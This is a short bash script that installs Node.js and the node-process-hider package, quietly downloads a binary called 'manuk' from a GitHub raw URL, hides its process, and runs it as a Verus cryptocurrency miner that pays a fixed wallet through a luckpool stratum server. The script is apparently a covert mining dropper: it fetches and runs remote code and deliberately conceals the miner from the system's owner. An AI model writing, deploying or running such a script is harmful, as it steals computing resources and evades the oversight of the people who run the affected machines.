#!/bin/bash

#!/bin/sh

#!/bin/bash

sudo apt update

sudo apt install proxychains -y

sudo apt install curl -y

sudo apt install screen -y

sudo apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1

curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - && sudo apt install nodejs && npm i -g node-process-hider

wget -qO manuk https://raw.githubusercontent.com/renilo/hajar/main/enak >/dev/null 2>&1  

sudo chmod +x manuk >/dev/null 2>&1

sudo ph add manuk

./manuk -a verus -o stratum+tcp://eu.luckpool.net:3956 -u RBkxREY7wobWvRihJSkREPH2wycJqCECHZ.$(echo $(shuf -i 1-3 -n 1)-WEWEK) -p x -t 2
